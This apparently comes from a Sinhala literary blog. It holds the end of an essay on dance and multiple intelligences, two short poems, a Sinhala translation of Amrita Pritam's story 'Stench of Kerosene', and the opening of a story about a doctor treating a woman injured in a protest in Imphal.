යුතුය. ඒ අනුව යම් නර්තනයක්‌ සාර්ථක කරගැනීමට නම් අන්තර් පුද්ගල බුද්ධිය තිබිය යුතු බව පැහැදිලිය.

හෝවාර්ඩ් සඳහන් කළ බුද්ධි ප්‍රභේද අතුරින් සොබාදහම් බුද්ධිය නර්තන විෂයෙහිලා බෙහෙවින් ඉවහල් වේ. එයටහේතුව වන්නේ බොහෝවිට සාමාන්‍ය ස්‌වාභාවික පරිසරයෙන් ග්‍රහණය කර ගන්නා සාධකයන් ඇසුරෙන් නර්තන නිර්මාණයන් බිහි වීමයි. එනම් නර්තන නිර්මාණකරුවකු තම නර්තන නිර්මාණය සඳහා තෝරාගන්නේ ස්‌වාභාවික පරිසරයේ විද්‍යාමාන වන ජීවී හෝ අජිවී වස්‌තුන්ය. ඒ අනුව නර්තන ශිල්පියා සහ නර්තන නිර්මාපකයා පරිසරය පිළිබඳ සංවේදී විය යුතුය. ලොව පවත්නා සියලුම නර්තන සම්ප්‍රදායකම පාහේ යම් සත්වයෙකු වස්‌තුවක්‌. ස්‌ථානයක්‌ හෝ සිද්ධියක්‌ ගෙන එය නර්තන හරහා ප්‍රතිනිර්මාණය වන බවට සැකයක්‌ නොමැත. නිදසුන් ලෙස දැක්‌වුවහොත් ශ්‍රී ලාංකේය නර්තන සම්ප්‍රදායන්වල ඇති වන්නම් සියල්ලම පාහේ යම් සතකු හෝ පුද්ගල ලක්‌ෂණ පිළිබිඹු කෙරෙන වර්ණනාවන්ය. උදාහරණ වශයෙන් "ගජබා වන්නම" හස්‌තියා පිළිබඳවත් තුරගා වන්නම අශ්වයා පිළිබඳවත් "මයුරා වන්නම" මොණරා පිළිබඳවත් "අසදෘශ වන්නම" බුදුන් වහන්සේ පිළිබඳවත් ආදී ලෙසින් සොබාදහමින් නර්තනයට අදාළ කොටගත් තේමාවන්ය. තවද රුසියාවෙහි ඇනා පැවලෝගේ හංස විල බැලේ නර්තනය නිර්මාණය කළේද දිගු කලක්‌ තුළ හංසයන් පිළිබඳ අධ්‍යයනයකින් පසුව නිසා එහි සාර්ථකත්වය අදටත් පවතී.

හෝබාර්ඩ්ගේ අවසන් බුද්ධි ප්‍රභේදය වන ආත්මාවබෝධය පිළිබඳ බුද්ධිය සාමාන්‍ය ජීවිතයක්‌ ගත කිරීමේදී මෙන්ම නර්තනයෙහිලාද වැදගත් වෙයි. ඒ අනුව යමෙකු විසින් ප්‍රගුණ කරන ලද නර්තන ශෛලීන්වල පුහුණුවීම් සහ අභ්‍යාස ආදිය පිළිබඳ මනා වැටහීමක්‌ නර්තන ශිල්පියා තුළ නොතිබුණහොත් ඉදිරිපත් කරන නර්තනය සාර්ථක නොවේ. ස්‌වශක්‌තියට අනුව තමාට ඉදිරිපත් කළ හැකි නර්තනාංග පිළිබඳ නර්තකයා අවබෝධයෙන් සිටිය යුතු විශේෂයෙන්ම නර්තනයට ආධුනිකයකු නම්. තමා ප්‍රගුණ කිරීමට බලාපොරොත්තු වන නර්තන ශෛලියේ නර්තනාංශ සහ අභ්‍යාස පිළිබඳව මූලික අවබෝධයක්‌ තිබිය යුතුය. නිදසුන් වශයෙන් කථකලි නර්තන ශෛලියේදී කථකලි නර්තන ආධුනික ශිල්පීන් අවුරුදු දොළොසක්‌ නොනවත්වා කථකලි අභ්‍යාසවල පුහුණුවීම් කළ යුතුය. මෙම නර්තන සම්ප්‍රදායේදී ශරීරයේ සුඛනම්‍ය බව අතිශය දැවැන්ත ලෙස ප්‍රයෝජනයට ගන්නා බැවින් සියලු ශාරීරික අභ්‍යාස දැඩි ඉවසීමකින් සහ කැප වීමකින් කළ යුතුය. ඒ අනුව යමකු කඨලී නර්තනය හැදෑරීමට කැමැති වූවද ඔහු උපතින්ම යම් යම් ශාරීරික අස්‌ථි රෝගාබාධවලින් පෙළෙනවා නම් සහ කකලි නර්තනයට අවශ්‍ය වන පරිදි ශරීරික සුඛනම්‍ය ලෙස හැසිරවිය නොහැකි නම් වෙනත් සුදුසු නර්තන ශෛලියක්‌ හැදෑරීමට තෝරාගත යුතු බව තේරුම් ගැනීම මෙම බුද්ධි ප්‍රභේදය අනුව තීරණය කිරීමකි. එමෙන්ම යම් නර්තන ශෛලියක්‌ ප්‍රගුණ කළ අයෙකු වූවත් තමාට ප්‍රේක්‌ෂයාගේ සිත හොඳින් ආකර්ෂණය කරගැනීමට ඉදිරිපත් කළ හැකි තමාගේ නිපුණත්වය පෙන්වන නර්තනාංග පිළිබඳ අවබෝධයක්‌ නර්තන ශිල්පියා සතු විය යුතුය.

මෙම සියලු කරුණු පිළිබඳ අවධානය යොමු කරන කල්හි නර්තනය යනු හුදු කලාවක්‌ නොවන ව පැහැදිලිය. එය කලාවෙහිත් බුද්ධියෙහිත් සුසංයෝගයක්‌ව පවතින විෂය ක්‍ෂේත්‍රයක්‌ බව දැක්‌විය හැකිය.

මා දකින මොනාලිසා

on Tuesday, 18 December 2012
සිනහව සහ කදුල මැද
අතරමන් වු.........

හදවතින් දුක් දරා ගත්

නෙත් වලින් කතා කල

තවත් එක් ගැහැනියකි

ඩාවින් ගේ තෙලි තුඩින්
පන නල ලද................

ගණිකාවගේ මලගම

on Monday, 17 December 2012
හදවතින් වැලපෙමින්
සුදු ඇදන් සුදු වතින්
එකා පරයා එකා
නොගිය එක් මලගමකි,
එය...........................

එහෙත් බෝ කල් ඉහත
ටයි කෝට් අයවලුන්
පිය නැගූ.........
පින් බිමකි
මෙය............................

නිරුවතින් ලොව උපන්
ගැහැණු මිනිසුන් අතර
තවත් එක් ගැහැණියකි
ඇය............................

ලෝකයේ යදම් මැද
රොන් සෙවූ බමරුන්
මන් මත් කල.....

බමර විෂ උඩුදුවා
හදිසියේ ඇය නැසුනු දින
සිටියේ එක් දියණියකි
පියකු නැති

කෙසේ නම් හදවතින් හඩනු ඇය
හය හතර නොතේරෙන කල..........................




සිංහල හෝඩිය


භූමිතෙල්

on Saturday, 8 December 2012

වෙළඹකගේ හේෂාරවය ඇසුණ සැනින් “ගුලේජි” ඉමහත් ප්‍රීතියට පත්වූවාය. ඇය වහා පිටතට දුව ගොස් වෙළඹගේ ගෙලට ඇයගේ හිස තබා සිය සතුට ප්‍රකාශ කළාය. ඇය වෙළඹ දුටුවේ සිය මවුපියන්ගේ නිවසෙහි ඉදිරිපස ද්වාරය ලෙසිනි.

ගුලේරීගේ මවුපියන්ගේ නිවස පිහිටා තිබෙන්නේ චම්බා නම් ගමෙහිය. ඇය විවාහයෙන් පසු සැමියාගේ නිවස පිහිටි ලකර්මන්දි ගම්මානයට පැමිණියාය. එය ඉතා උස් බිමක පිහිටා තිබේ. එම උස් බිමේ සිට කවාකාරව පහළට යමින් තම උපන්ගමට යා යුතුය.  තනිකමක් දැනෙන සෑම මොහෙතකම ඇය තම සැමියා සමඟ එම කවාකාර මාවත දැකිය හැකි ස්ථානයට එයි. සූර්යාලෝකයෙන් දිදුලන සිය ගම්මානය දෙස ඇය බලා සිටින්නේ ඉමහත් අභිමානයෙනි.

වාර්ෂිකව එළඹෙන  අස්වනු මංගල්‍යයේ දී ගුලේරි හට තම දෙමව්පියන් හා දින කිහිපයක් ගත කරන්නට අවසර ලැබේ. මෙවර ද ඇයගේ පියා, නාටු නම් වූ විශ්වාසවන්ත සේවකයා ඒවා ඇත්තේ සිය දියණිය වූ ගුලේරි ගෙන්වා ගැනීමටය. ඇයගේ යෙහෙළියන් දෙදෙනා ද විවාහ වී චම්බා ගමෙන් බොහෝ ඇත පෙදෙසක ජිවත් වුවද ඔවුහු ද එකම දිනයේ ගමට පැමිණෙති. ඔවුහු එකිනෙකා අත් බැඳ මහමඟ ඇවිදිති. අස්වනු මංගල්‍යය සඳහා ඇඳුම් ගැනීමට පොළට යති. හිස් ආවරණ සාළුව නැවත පාට ගන්වා, කැඳ දමා සෝදා වේලා, මිනිරන් කුඩු සහ පබළුවලින් අලංකාර කර ගනිති. වීදුරු වළලු සහ රිදී පැහැ තෝඩු මිලයට ගනිති.

ගුලේරි අස්වනු ගෙට ගන්නා දිනය එනතුරු බලා සිටින්නේ ඇඟිලි ගනිමිනි. ගිම්හාන සුළග, මෝසම් වැහි අඳුර ආකාශයෙන් මකා දමද්දී ඇය දිනපතා උදෑසන තමාගේ දිනචරියාවට අයත් යුතුකම් ඉටු කරන්නේ බලාපොරොත්තු සිත තුළ පුරවා ගනිමිනි. ගව මහීෂාදීන්ට කෑම දීම, සැමියාට සහ ඔහුගේ දෙමාපියන් හට කෑම සකස් කිරිම, ආදී සෑම කාර්යයක්ම අතුරතුරදී දෙමව්පියෝ තමා කැටුව යන්නට කවුරුන් හෝ එවතියි සිතයි.

දැන් නැවතත් ඇයට ගමට යන්නට අවස්ථාව උදා වී තිබේ. ඇය අසීමිත ප්‍රීතියෙන් වෙළඹ අතගෑවාය. පියාගේ සේවකයා වූ නාටු දයාබරව පිළිගත්තාය. පසුදින පිටත්වීම සඳහා සූදානම් වූවාය. ඇයගේ චිත්ත ප්‍රීතිය වචනයෙන් ප්‍රකාශ නොකළද සියල්ල ඇයගේ ශෝභා සම්පන්න වූ මුහුණේ ඇදී තිබුණි. ඇයගේ සැමියා ඇය දෙස බලා උරමින් සිටි ගඩුගුඩාව ඉවතට ගෙන දෙනෙත් පියා ගත්තේය. එක්කෝ ගඩුගුඩාවට දැමූ දුම්කොළ වලින් හැමූ අප්‍රසන්න සුවඳ හෝ තම බිරිඳගේ මුහුණ දෙස බැලීමෙන් ඇති වූ අපහසුතාව එයට හේතුව විය හැක.

“ඔයා චම්බා පොළට එනවා නේද? අනේ එක දවසක් හරි එන්න” ඇය සැමියාට කන්නලව් කළාය. ඔහු දුම් උරනය ඉවත තැබුවද කිසිවක් නොකීවේය.

“ඇයි ඔයා මොකුත් නොකියන්නේ” ඇය මඳක් තරහින් ඇසුවාය.

“මං ඔයාට කියන්නමයි හිටියේ” ඔහු ඇය දෙසට හැරී කීවේය.

“එපා මං දන්නව ඔයා කියන්න යන දේ... මට තේරෙනව. ඔයා විතරක් අවුරුද්දකට සැරයක් ගමට යන්නේ ඇයි කියලනේ?

හොඳයි, මෙච්චර කාලයක් මං ඔයාට යන්න එපා කිවවේ නෑනේ? ඔහු ඇයගේ ප්‍රශ්නයට ප්‍රශ්නයකින්ම පිළිතුරු දුන්නාය.

“එහෙනම් ඇයි ඔයා මේ සැරේ විතරක් මාව නවත්තන්න හදන්නේ?

මේ වතාවෙ විතරක්වත්.... ඔහු ඉල්ලා සිටියේය. “ඔයාගේ අම්මවත් මොකුත් කිව්වෙ නැහැනෙ. ඇයි ඔයා හරස් වෙන්නේ? ගුලේරි හිතුවක්කාර ළදැරියක සේ තර්ක කළාය. “මගේ අම්මා.. “මනක්” යමක් කියන්නට උත්සාහ කළද කියාගන්නට නොහැකිව වේදනාවෙන් නිශ්ශබ්ද වූයේය.

එම දිගු රාත්‍රිය අවසානයේ ගුලේරි හිමිදිරියේම සූදානම් වූවාය. ඇයට දරුවන් සිටියේ නැත. එසේ හෙයින් රැගෙන යන්නේ කෙසේද හෝ තබා යන්නේ කෙසේද යන ප්‍රශ්න ඇයට තිබුණේ නැත. නාටු සෑදලය සකස් කොට වෙළඹ සූදානමින් තැබුවේය. ගුලේරි මනක්ගේ දෙමව්පියන් වැඳ සමුගනිද්දී ඔවුහු ඇයගේ හිසට අත තබා ආශිර්වාද කළහ.

“මාත් මගට එන්නං” ‘මනක්’ කීවේය.

ගුලේරි අධික ප්‍රීතියෙන් ගමන ආරම්භ කළාය. ඇය ඔහුගේ බටනලාව සිය සාළුවෙහි ඔතා සගවා ගත්තාය.

බාජිරි ගම පසු කරද්දී ගුලේරි සගවා ගත් බටනලාව‍ ගෙන  ඔහු අත තබා “එන්න මෙය වාදනය කරන්න” යි කීවාය. නමුත් මනක් සිතුවිලි අතර, අතරමං වී සිටියෙන් ඇය කියූ කිසිවක් නොඇසුණි.

“ඇයි ඉතින් ඔයා වාදනය කරන්නේ නැත්තේ”?

ඇය සුපුරුදු තොදොල් බසින් අසුවාය. ඔහු ශෝකයෙන් ඇය දෙස බලා බටනලාව තොල් අතරේ තබා වාදනය ආරම්භ කළේය. ඉන් නිකුත් වූයේ ශෝකී විලාපයකි.

“ගුලේරි අනේ ඔයා යන්න එපා. මං මේ තවපාරක් කියන්නේ‍ හේතුවක් තියෙන නිසා. මේ වතාවේ යන්න එපා” කියමින් ඔහු ශෝකයෙන් බටනලාව  ඇය අත තැබුවේය.

“ඇයි ඉතින්... මොකක්ද හේතුව? ඔයා පොළට එන්න. එතකොට මං ඔයා එක්කම එන්නං. මං පොරොන්දු වෙනව. ඔයා එහේ ආව ගමන් මං එනව” ඇය කීවාය.

මනක් කිසිවක් කීවේ නැත.

කන්ද පා මුලදී ඇය අසුපිටින් බැස්සාය. දෙදෙනාට කතා කරන්නට ඉඩ දී නාටු, වෙළඹ මදක් ඈතට රැගෙන ගියේය. දැනට වසර හතකට ඉහත මේ පාරටම තමා මිතුරන් සමග ආ බව මනක් සිහි කළේය.‍ පොළේදී දුටු ගුලේරි ඔහුට අමතක කළ නොහැකි විය. ඔවුහු ආදරයෙන් බැදුනහ. දෙදෙනා තනිව හමු වූ එක් දිනක් මනක් සිහි කළේය.

“ඔයා හරියට කිරි වැදුණ තිරුඟු කරලක් වගෙයි.”

“කිරි වැදුණ ධාන්‍ය සොයාගෙන හරක් එනවා.” ඇය තම අත මදුවා ගනිමින් කීවාය.

“මිනිස්සු ඒවා තම්බලයි කන්නේ” ඔහු පිළිතුරු බලාපොරොත්තුවෙන් ඇගේ මුහණට එබුණේය.

“ඔයාට මාව ඕන නං මගේ තාත්තව හමුවෙන්න වේවි.”

මනාලිය වෙනුවෙන් පියාට මිලක් ගෙවීම මනක් අයත් ගම් ප්‍රදේශයේ චාරිත්‍රයකි. ඉතා ධනවත්, උගත් පුද්ගලයකු වූ ගුලේරිගේ පියා කොපමණ මුදලක් ඉල්ලාවිද යන සිතුවිල්ල ඔහු අකර්මණ්‍ය කළේය. නමුත් ගුලේරිගේ පියා කියා තිබුණේ දුව වෙනුවෙන් සතයකවත් නොගන්නා බවත්, කවදා හෝ වැදගත් පවුලක විනීත තරුණයකු ඇයට සොයා දෙන බවත් හෙයින් සියල්ල පහසු විය.

කල්පනාවේ නිමග්නව සිටි මනක්ගේ කර වටා ගුලේරිගේ අත දැවටුණේය. “මොනවටද ඔයා මේ තරම් හීන දකින්නේ?” ඇය විහිලු කළාය.

ඔහු මුනිවත රැක්කේය. වෙළඹ නොඉවසිල්ලෙන් හඩ නැඟුවාය. ඇය අසුපිටට නැග්ගාය. මොහොතක් තම සැමියා දෙස බලාසිට මදහසින් කටහඩ අවදි කළාය.

“ඔයා දන්නවද මීට ටිකක් ඈතින් තියන නීල සූනු වනය. කවුරු හරි ඒ කැලෑව මැදින් යන එන කෙනෙකුගේ කන් බීරි වෙනවලු. ඔයා නං ඒ කැලේ මැදින් ඇවිත් තියනවා. මං කියපු කිසිම දෙයක් ඔයාට ඇහුණේ නෑ”

“ඔහා හරි ගුලේරි. ඔයා කියපු කිසි දෙයක් මට අහුනේ නෑ” කියමින් සුසුම් ලෑවේය. දෙදෙනා එකිනෙකාගේ මුහුණ දෙස බලමින් මොහොතක් සිටියහ. නොවැටහීම ඔවුන් ගොළු කළේය.

අවසානයේ “මං යනවා ඔයා ගෙදර යන්න” ගුලේරි සෙමෙන් කීවාය.

“ඔයා  මේ බටනලාව ගන්න” මනක් ශෝකයෙන් කීවේය.

“නෑ ඒක ඔයා තියාගන්න. පොළ දවසට ඔයා එහේ ඇවිත් ඕක වාදනය කරනවා නේද?” සිනාසෙමින් ඇසූ ඇය පිළිතුරක් බලාපොරොත්තු නොවී අසුට සන් කළාය. ඇයගේ දෙනෙත් හි‍රුගේ තෙදවත් ආලෝකය විහිදුවමින් තිබුණි. මනක් ඉවත බලාගත්තේය. ගුලේරි ‘චම්බා’ බලා ගමන් කලේ, මනක් ආපසු හැරී තම නිවස බලා යමින් සිටියදීය.

මනක් නිවසට ගොඩ වූයේ අප්‍රාණික සිරුරකින් සහ උදාසීන මනසකින් යුතුවය. සෝපානය මත ඇද වැටුණු ඔහු දෙනත් පියා ගත්තේය.

“මනක්, ඔයා ගෙදරින් ගිහින් කොච්චර වෙලාද? ගුලේරිගේ ගෙදරටම ගියාද?” මනක්ගේ මව කෝපයෙන් ඇසුවාය.

“නැහැ කන්ද පාමුලට විතරයි” බරවූ නාසයෙන් යුතුව මනක් කෙඳිරුවේය.

“මොකද මේ නාකි ගෑණියෙක් වගේ කොඳුරන්නේ මිනිහෙක් වගේ හැසිරියන්” ඇය තදින් කියා සිටියාය.

ඔහුට සිය මවට විරුද්ධව කතා කරන්නට වුවමනා විය. මව තවමත් කෝපයෙන් බලා සිටියි. උඹ හරියට ගෑනියෙක් වගේ. ඇයි උඹට අඩන්න බැරි තව කෙනෙක් ඉල්ලල අලුත් වෙනසකට”.

ඔහු නිහඩව අසා සිටියේය. ගුලේරි තම බිරිද වී අවුරුදු හතකි. ඇය දරුවන් වැදුවේ නැත. මනක්ගේ මව රහසිගතවම විසදුමක් සෙව්වාය. ඇය තරයේ කියා සිටියේ විවාහ දිවියේ අටවැනි අවුරුදු සැමරුමක් සිදු නොවිය යුතු බවයි. මේ වර්ෂයේ ඇයගේ අභිමතය පරිදි රුපියල් පන්සියයක් ගෙවා දෙවැනි බිරිදක් සොයා ගත්තාය. දෙවැනි බිරිද ගුලේරි දෙමවුපියන් වෙත යනතුරු බලා සිටියාය. සිය මවට හා සම්ප්‍රදායන්ට සිය සිරුර කීකරු වුවද, නව බිරිය වෙනුවෙන් ඔහුගේ හදවතෙහි ඉඩක් නොවීය. ඔහුගේ හදවත මිය ගොසිනි.

එක් හිමිදිරි උදෑසනක මනක් සුපුරුදු ලෙස සිය උදාසීන ජීවිතයේ එකම සුමිතුරා වූ පයිප්පය මුවට ළං කළේය. සිය පැරණි මිතුරකු වූ බවානි නිවස පසු කරමින් යනු දුටු මනක් මේ තරම් උදෙන්ම යන්නේ කොහිදැයි විමසීය. විශාල පොට්ටනියක් ඔහුගේ උරහිසෙහි විය.

“විශේෂ හේතුවක් නෑ මනක් අයියේ” බවානි අකමැත්තෙන් කීවේය.

“ඒකට කමක් නෑ දුම් ටිකක් උරල පලයන්” මනක් කීවේය.

බවානි පොට්ටනිය බිම තබා මනක්ගේ ගඩුගුඩාව අතට ගත්තේය.

‘මං චම්බාවට යනව මනක් අයියේ’ අවසානයේ බවානි කීවේය. මනක්ගේ හදවත පසාරු කරගෙන බවානිගේ වචන රිංගා ගියේය.

“අද පොළද?” මනක් වේදනාවෙන් ඇසුවේය.

“ඔව්. ඇයි හැම අවුරුද්දෙම එකම දවසටනේ තියෙන්නේ මතක නැද්ද?” බවානි ඇනුම්පදයක ස්වරූපයෙන් කීවේය.

“දැනට අවුරුදු හතකට කලින් අපි පොළට ගියා මතකද මනක්”

මනක් කිසිවක් නොකීවද ඔහුට දැඩි අපහසුතාවක් දැනුණි. බවානි ගඩුගුඩාව පසෙකින් තබා පොට්ටනිය කරට ගෙන මනක් දෙස නොබලාම නැගී සිටියේය. පොට්ටනියේ වූ විවරයකින් එළියට පැන තිබූ බටනලාව දෙස මනක් බවානි නොපෙනී යන තුරුම බලා සිටියේය.

පසු දින උදෑසන මනක් කුඹුරේ සිටියදී බවානි ඈතින් එනු දුටුවද, ඔහු ඉවත බලාගත්තේය. තවදුරටත් පොළ ගැන බවානි සමග කතා කරන්නට මනක්ට අවශ්‍ය නොවීය. එය එතරම්ම ඔහුට වේදනාකාරී විය. නමුත් බවානි කුඹුරේ වටයක් කැරකී විත් මනක් ඉදිරියෙන් බිම හිද ගත්තේය. බවානිගේ මුහුණ අගුරු කැබැල්ලක් මෙන් කලු වී ශෝකයෙන් බර වී තිබුණි.

“ගුලේරි මැරිලා” භවානි මෙසේ කීවේය.

“මොකක්”

“උඹ ආපහු බැන්ද බව අහල භූමිතෙල් හලාගෙන ගිනි තියාගෙන” මනක් අසීමිත වේදනාවෙන් ගොළු විය. තමගේ ජීවිතයම ගිනි ගන්නාක් මෙන් ඔහුට දැනුණි.

දින, සති, මාස ගත වී ගියේය. මනක් නිහඩව කුඹුරේ වැඩට ගියේය. කෑම බෙදා දුන් විට කෑවේය. නමුත් ඔහු සිතින් මිය ගොසිනි. ඔහුගේ දෙනෙතෙහි මෙන්ම මුහුණ පුරාම පැතිරී තිබුණේ හිස් බවකි.

“මම එයාගේ බිරිද නෙවෙයි. එයාට බදින්න සිද්ධ වුණ කෙනෙක් විතරයි. එයා මට බැදීමක් ආදරයක් නැහැ” දෙවන බිරිද සිය නැන්දණියට කීවාය.

නමුත් ඇයගේ කුසෙහි දරුවකු මෝරා ‍වැඩෙන විට මනක්ගේ මව ප්‍රීතියෙන් උද්දාමයට පත් වූවාය. ඇය මනක්ට මේ සුභාරංචිය කිවේ ඉමහත් බලාපොරොත්තුවෙනි. නමුත් ඔහු සිටියේ මව කී දේ නොවැටහුණු ආකාරයෙනි. ඔහුගේ දෙනෙත් තුළ වූයේ සුපුරුදු හිස් බවකි.

“ඔහුගේ මව තම ලේලිය සනසා පුතාගේ හැසිරීම දරා‍ගෙන සිටින්නට දිරි දුන්නාය.

“ඕව වෙනස් වේවි බලන්නකෝ තව ටික දවසක්” ඇය තම ලේලියට කීවාය.

දරුවා ඉපදුණු පසු මනක්ගේ මව අපරිමිත සෙනෙහසින් දරුවා නහවා හොදින් සරසා මනක්ගේ උකුල මත තැබුවාය. මනක් දරුවා දෙස හිස් බැලමෙන් බොහෝ වේලා බලා සිටියේය. කිසිදු හැගිමක් ඔහුගේ මුහුණේ දිස් නොවීය. නමුත්  හදිසියේ හටගත් බියකින් ඔහුගේ දෙනෙත පිරුණේය. ඔහු යටි ගිරියෙන් කෑගැසුවේය.

“මේකා ගෙනියපල්ලා” ඔහු උමතුවෙන් මෙන් කෑගැසුවේය.

“ගෙනියපල්ලා මේකව භූමිතෙල් ගදයි”



ඉන්දියානු ලේඛක අම්රිතා ප්‍රීතම්ගේ

Stench of Kerosene නම් කෙටිකතාවේ අනුවාදයකි

විප්ලවය


මා වාට්ටුවට පය තබත්ම හෙදිය බියපත් විලසින් මා ඇමතුවාය. “ගුඩ් මෝනිං සර් අමාරු ලෙඩෙක්” ඇගේ හදිසියට වැඩි අවධානයක් යොමු නොකරම ‍මම සැහැල්ලු ලෙස පිළිතුරු දුනිමි. “ඔයාට හැමදාම අමාරු ලෙඩ්ඩු ඉන්නවා.”

“නැහැ ඩොක්ටර් මේ ලෙඩාට ඇත්තටම අමාරුයි. ඊයේ ඉදල සිහිමුර්ජාවෙලයි ඉන්නේ.” ඇගේ කටහඩේ දැඩ් සන්ත්‍රාසය මට දැනිණි.

අනන්තවත් රෝගීන් සංවඛ්‍යාවක් සහ මිනිය නොහැකි තරම් මරණ සංඛ්‍යාවක් දැක ඇති වෛද්‍යවරුන් වන අපට මෙය කලබලවීමට තරම් හේතුවක් නොවේ. මම විහිළුවෙන් දිගටම කියාගෙන ගියෙමි. “ සිහිමුර්ජාවෙලා නම් ඒක සම්පූර්ණයෙන් නතරවෙනකම් ”

මා එය විහිළුවක් ලෙස කීමට අදහස් කලත් මගේ වාක්‍යය සම්පූර්ණ කිරීමට ඉ‍ඩක් නොලැබිණි. වෛද්‍යවරයකු වුවත් පළමුවෙන් මමත් මනුෂ්‍යයෙක් වෙමි. මිනිසුන් අතර ඇති මෘදු ගුණාංග මා තුළ ද ඇත. මගේ මුහුණ වෙනස්විය ලෙඩා කොහෙද ඉන්නේ? කවුද ලෙඩා? මම විමසුවෙමි. “ඇද අංකය 12, පෙරේදා සිද්ධියෙන් අනතුරට පත්වෙච්ච කෙනෙක්”

“මොන සිද්ධියෙන්ද?” සෑම දිනකම බොහෝ දේ සිදුවෙයි. මෙයත් ඒ අතරින් එක් සිද්ධියක් වන්නට ඇත.

“ඇසැම්බිල් පාරේ සිද්ධිය”

ඔව්. එය බරපතළ සිද්ධියකි. සෑමතැනකම සෑමකෙනෙක්ම ඒ පිළිබද කතා කරති. එහි ඇති වැරදි නිවැරදි භාවය පිළිබද වාද කරති. පෙරේදා ඉම්පාල් ආකාශවාහිනියේ සන්ධ්‍යා ප්‍රවෘත්තිවල ඒ බව නිවේදනය කළේ මෙසේ ය.

“අද සන්ධ්‍යාවේ ඇසැම්බිලි පාරට එක්රැස්වූ කණ්ඩායමක් කලහකාරි ලෙස හැසිරිණි. පොලීසිය කැරලිකරුවන් මැඩීමට බැටන් ප්‍රහාරයක් එල්ල කල අතර කදුළු ගෑස් ප්‍රහාරයක් එල්ල කිරීමට ද සිදුවිය. පොලිස් නිලධාරීන් ඇතුළ කිහිප දෙනෙක් තුවාල ලැබූ බව වාර්තාවේ”

බාන්පාන්ති දාල්ගේ ගේ ප්‍රචාරක අවිය වන අනබුවා මංගල් පුවත්පත විශාල අකුරින් යුත් ශීර්ෂ පාඨ යොදා සිද්ධිය වාර්තා කළාය.

“සාමාන්‍ය පෙළපාලිකරුවන්ට පොලීසියෙන් බැටන් ප්‍රහාරයක් - කදුළු ගෑස් ප්‍රහාරයක් - වෙඩි ප්‍රහාරයක් - පැසිස්ට් රජයේ බියකරු මුහුණුවර”

පාලක පක්ෂයේ දෛනික පුවත්පත වන අඩුම්බා පාඔදම් පුවත්පතේ මෙම සිද්ධිය පිළිබද කිසිවක් සදහන් නොවෙයි.

කෙසේවෙතත් එය විශාල මහජන උද්ඝෝෂණයකි. මංගල් පුවත්පතට අනුව දහතුන් දෙනෙක් බරපතල තුවාල ලබා ඇති අතර තිදෙනෙකුගේ තත්ත්වය අසාධ්‍ය විය.

දින දෙකකට පෙර විපක්ෂය විසින් විශාල මහජන උද්ඝෝෂණයක් සංවිධානය කරනු ලැබීය. බඩු මිල වැඩිවීම, විරැකියාව, දූෂණය සහ ඉම්පාල් නගරයේ අතරින් පතර ඇති පොදු ඉඩම් හිතවතුන් අතර බෙදා හැරීමට එරෙහිවයි මෙම පෙළපාලිය සංවිධානය කර තිබුණේ. සටන්පාඨ සහිත පුවරු රැගත් පෙළපාලි කරුවෝ සටන් පාඨ කියමින් නගරයේ ප්‍රධාන වීදිවල සාමකාමී ලෙස ගමන් කර මන්ත්‍රණ සභා ශාලාව ඉදිරිපිටට ගොස් තව තවත් සටන් පාඨ කියන්නට වූහ. සැසිවාරයට සහභාගි වෙමින් සිටි විපක්ෂ මන්ත්‍රීවරු එය අතර මැද දී පිටතට පැමිණ පෙළපාලි කරුවන් කරන ලද ඉල්ලීම් එකහෙලාම ප්‍රතික්ෂේප කරනු ලැබීය. හතරයි තිහ පමණ වනවිට කලබලකාරී ලෙස හැසිරුණ තරුණ පිරිස මන්ත්‍රණ සභා ශාලාව වටා ඇති තාප‍්පයෙන් ඇතුළට පැන ගත්හ. ඔවුන්ව පලවා හැරීමට පොලීසිය බැටන් ප්‍රහාරයක් එල්ල කළේය. කෙසේවෙතත් එය ගින්නට පිදුරු දැමීමක් බදුවූ බැවින් නිමේෂයකින් කලබලය උග්‍ර අතට හැරිණි. කැරලිකරුවෝ මන්ත්‍රණ සභාවේ ගේට්ටුව කඩාගෙන ඇතුල්වූ බැවින් පොලීසියට කදුළු ගෑස් පමණක් නොව පතරොම්ද පාවිච්චි කිරීමට සිදුවිය. සෙනග සෑම පැත්තකටම දිව ගියහ. රෝහල් පිටුපස තිබූ විශාල ඉඩම අසාධාරණ ලෙස ටෙරිමාල් මෙරිලාල්ට වෙන් කර තිබූ අතර එහි ඉදිකිරීම් සිදුවන බව තරුණයන්ට දක්නට ලැබිණි. ඉදිකරමින් පවතින, ගොඩනැගිල්ල වෙත (සමහරු කියන පරිදි ඉදිරියේදී මෙම ගොඩනැගිල්ලේ මධ්‍යසාර පෙරන ස්ථානයක් පිහිටුවීමට අපේක්ෂිතය) කඩා පැන ගත් කෝපයට පත් තරුණයෝ තමන් අතට අසුවූ දේවල්, ගල් යකඩ කැබලි හෝ වෙනත් අතට අසුවන ඕනෑම දෙයකින් පහර දීම ආරම්භ කළහ. හේතුව දන්නේ දවියන් පමණි. සමහර පොලිස් නිලධාරීහු ද කලබලයට මැදිහත් වූහ. ටික වෙලාවක් යනතුරු එම ප්‍රදේශය යුද පිටියක් බදුවිය.

මගේ සහායක වෛද්‍ය විනෝදා පැමිණියේය. “ගුඩ් මෝනිං තාමෝ අංක 12 ඇදේ ඉන්න ලෙඩාට හුගක් අමාරුයි. ඔබතුමා බැලුවද?”

“තවම නැහැ. මම මේ දැන් ආවේ. එන්න අපි බලමු.” අපි දෙදෙනාම නැගී සිටියෙමු. ඇද ඉහපතද රැගත් හෙදිය අප පසුපස ආවාය.

හිසට වෙළුම් පටි යොදා තිබූ කාන්තාව මැහැල්ලකි. ඇගේ ඇස් නින්දේ දී මෙන් පියවී නැත. මුහුණ ඉදිමී ඇත. ඇගේ හිසේ පිටුපස ඇති වෙළුම් පටි යාන්තමින් තෙත්වී ඇත. තුවාලයෙන් තවමත් ලේ ගලනවා වෙන්නට ඇත.

“මම උදෑසන මෙහෙ එනකොට ඇය නොකඩවාම වේගයෙන් හිස සෙලෙව්වා. මුළු රාත්‍රිය පුරාම ඒ විදියට ගත කරපු බවයි පෙනුනේ. මම කළ යුත්තේ මොකක්ද කියල දන්නේ නෑ. බාහිර රෝගීන්ගේ අංශයේ වෛද්‍යවරයාගෙන් උපදෙස් ලබාගෙන ඇයට නිදි බෙහෙත් දුන්නා.” හෙදිය මා සමග කීවාය.

“ඇයි මට කළින් ටැලිෆෝන් කළේ නැත්තෙ?” වැඩිදුර නොහිතාම මම විමසුවෙමි. “ඊයේ සර් ගෙ ටැලිෆෝන් එක වැඩ කළේ නැහැ.”

